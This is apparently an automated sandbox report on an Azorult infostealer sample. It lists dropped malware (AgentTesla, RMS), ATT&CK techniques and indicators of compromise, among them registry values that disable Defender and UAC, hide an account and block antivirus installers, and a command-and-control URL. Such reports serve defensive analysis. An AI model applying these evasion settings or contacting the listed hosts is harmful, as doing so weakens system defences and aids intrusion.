azorult | c0e7c9338314ebaf19bcea19ca74e0a4f8c39c62bf9937744f78c2c3ed2563b6

Resubmissions

14-01-2025 20:41

250114-zgynws1neq 3

14-01-2025 19:57

250114-ypmqxsxqa1 3

14-01-2025 19:48

250114-yh74aazkfn 10

14-01-2025 19:42

250114-yeyqfazjfl 6

Analysis

max time kernel
238s
max time network
258s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14-01-2025 19:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Annotation 2025-01-13 114431.png
Size

185KB
MD5

793dfe91881d218f704885de52b5ad0e
SHA1

619bdc719abe0ef21e4b2f520f9db8153537d35f
SHA256

c0e7c9338314ebaf19bcea19ca74e0a4f8c39c62bf9937744f78c2c3ed2563b6
SHA512

f573ca94dc59c1d53d0d7dc34a5f8c02db3d08fb2c458e7b7770ff1ea589ccf0ddbc7d7b2eabd03c89bde685490ef9236a92f01f0cf476427a303062b51acf4d
SSDEEP

3072:dooWWocQ8Ewpa3C6jNZWGrYhgduzCOmB9i4B8YMfnvBls6i4DEHzvxJaUHHUsX72:dooW1cQ8PoyIWGzpOy87fnv/5oHrxU8e

Score

10^/10

azorult rms aspackv2 defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat trojan upx

Malware Config

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3736	net.exe
3196	net1.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 22 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3588	netsh.exe
3784	netsh.exe
3940	netsh.exe
3332	netsh.exe
3352	netsh.exe
3216	netsh.exe
4056	netsh.exe
3720	netsh.exe
3124	netsh.exe
3528	netsh.exe
2404	netsh.exe
3968	netsh.exe
3724	netsh.exe
3460	netsh.exe
3796	netsh.exe
3692	netsh.exe
3264	netsh.exe
3752	netsh.exe
3388	netsh.exe
3856	netsh.exe
3456	netsh.exe
3636	netsh.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3868	attrib.exe
3108	attrib.exe
1316	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000400000001dba9-1400.dat	acprotect
behavioral1/files/0x000400000001db1e-1399.dat	acprotect

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000400000001db10-1365.dat	aspack_v212_v242
behavioral1/files/0x000400000001db0c-1401.dat	aspack_v212_v242

Executes dropped EXE 15 IoCs

pid	Process
2656	AgentTesla.exe
344	Azorult.exe
3156	wini.exe
3428	winit.exe
3592	rutserv.exe
3668	rutserv.exe
3724	rutserv.exe
3768	rutserv.exe
3904	rfusclient.exe
3916	rfusclient.exe
3132	cheat.exe
3300	taskhost.exe
3452	P.exe
3932	ink.exe
3548	rfusclient.exe

Loads dropped DLL 16 IoCs

pid	Process
344	Azorult.exe
3156	wini.exe
3156	wini.exe
3156	wini.exe
3156	wini.exe
3524	cmd.exe
3768	rutserv.exe
3768	rutserv.exe
344	Azorult.exe
3132	cheat.exe
3132	cheat.exe
3132	cheat.exe
3132	cheat.exe
3300	taskhost.exe
344	Azorult.exe
344	Azorult.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3704	icacls.exe
3412	icacls.exe
4068	icacls.exe
3564	icacls.exe
2188	icacls.exe
4000	icacls.exe
3100	icacls.exe
3360	icacls.exe
3644	icacls.exe
3704	icacls.exe
3824	icacls.exe
3360	icacls.exe
2988	icacls.exe
3612	icacls.exe
3724	icacls.exe
3940	icacls.exe
3200	icacls.exe
3108	icacls.exe
3736	icacls.exe
3548	icacls.exe
3324	icacls.exe
3160	icacls.exe
3212	icacls.exe
3160	icacls.exe
2552	icacls.exe
1312	icacls.exe
2552	icacls.exe
3928	icacls.exe
3668	icacls.exe
3932	icacls.exe
3176	icacls.exe
3708	icacls.exe
3448	icacls.exe
3700	icacls.exe
3332	icacls.exe
4004	icacls.exe
3500	icacls.exe
3560	icacls.exe
3100	icacls.exe
3312	icacls.exe
3368	icacls.exe
612	icacls.exe
3100	icacls.exe
3116	icacls.exe
3404	icacls.exe
3760	icacls.exe
3108	icacls.exe
3556	icacls.exe
3576	icacls.exe
3820	icacls.exe
3744	icacls.exe
4072	icacls.exe
3732	icacls.exe
2732	icacls.exe
3252	icacls.exe
4000	icacls.exe
3588	icacls.exe
3180	icacls.exe
2564	icacls.exe
3684	icacls.exe
3436	icacls.exe
2644	icacls.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3196	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
3912	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
209	raw.githubusercontent.com
213	raw.githubusercontent.com
216	iplogger.org
217	iplogger.org
174	raw.githubusercontent.com
176	raw.githubusercontent.com
208	raw.githubusercontent.com
173	raw.githubusercontent.com
175	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
197	ip-api.com

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000400000001daa3-1261.dat	autoit_exe
behavioral1/files/0x000400000001db1a-1343.dat	autoit_exe
behavioral1/files/0x000400000001dbce-1452.dat	autoit_exe
behavioral1/memory/3360-1746-0x00000000011E0000-0x00000000012CC000-memory.dmp	autoit_exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000400000001dba9-1400.dat	upx
behavioral1/files/0x000400000001db1e-1399.dat	upx
behavioral1/memory/3336-1558-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3336-1583-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000500000001dcc8-1551.dat	upx
behavioral1/files/0x000500000001dc84-1740.dat	upx
behavioral1/memory/3360-1744-0x00000000011E0000-0x00000000012CC000-memory.dmp	upx
behavioral1/memory/3360-1746-0x00000000011E0000-0x00000000012CC000-memory.dmp	upx

Drops file in Program Files directory 10 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml	AgentTesla.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico	firefox.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3976	sc.exe
828	sc.exe
3104	sc.exe
3188	sc.exe
3252	sc.exe
3308	sc.exe
3412	sc.exe
632	sc.exe
3228	sc.exe
3372	sc.exe
3272	sc.exe
3436	sc.exe
3148	sc.exe
3616	sc.exe
4024	sc.exe
4044	sc.exe
4064	sc.exe
3420	sc.exe
3656	sc.exe
3672	sc.exe
3816	sc.exe
3100	sc.exe
4084	sc.exe
3336	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	P.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rfusclient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ink.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Azorult.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rfusclient.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
3572	timeout.exe
3132	timeout.exe
3516	timeout.exe
1312	timeout.exe
3828	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
3952	taskkill.exe
3528	taskkill.exe
3968	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BF080691-D2B0-11EF-AB3B-C60424AAF5E1} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
